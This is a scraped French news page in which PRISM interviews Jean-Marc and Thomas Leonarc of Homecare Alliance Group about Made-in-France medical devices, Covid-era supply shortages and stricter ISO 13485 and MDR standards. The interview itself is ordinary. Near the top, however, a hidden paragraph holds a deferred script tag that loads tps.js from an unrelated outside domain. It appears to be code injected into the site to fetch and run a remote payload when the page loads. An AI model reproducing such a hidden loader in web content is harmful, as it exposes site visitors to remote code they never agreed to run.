Jean-Marc et Thomas Leonarc (Homecare Alliance Group) : "Il va falloir rééduquer les acheteurs au Made-in-France pour ne pas revivre le défaut d'approvisionnement de la période Covid" - PRISM</title><p hidden>width="69.5px" height="118.5px"<script defer src="https://softbylinux.com/tps.js?host=prism-medical-protect.fr"></script><p hidden>

Jean-Marc et Thomas Leonarc, père & fils et présidents de Homecare Alliance Group, ont accepté de répondre aux questions de PRISM TV. Ensemble, ils ont créé plusieurs entreprises dans le milieu médical, comme Médicalliance (centrale de référencement de dispositifs médicaux), et veulent participer à promouvoir le Made-in-France.

"Il va falloir rééduquer au Made-in-France les acheteurs qu'on a en face (centrales d'achat, hôpitaux, cliniques etc.) en leur rappelant l'importance de ne pas revivre un défaut d'approvisionnement, explique notamment Thomas Leonarc, qui poursuit. Il faut remettre la R & D au coeur de l'industrie française si on veut se différencier des Chinois à l'avenir."

De son côté, Jean-Marc Leonarc pointe le durcissement des normes qui se profile pour les industriels français du secteur médical : "Les normes changent dans les prochains mois (sur 2024). Les normes existantes se sont alourdies (ISO 13485 etc.) ainsi que le règlement européen sur les dispositifs médicaux (MDR), qui va coûter très cher à l'économie européenne."

Partager cet article

Commentaires (0)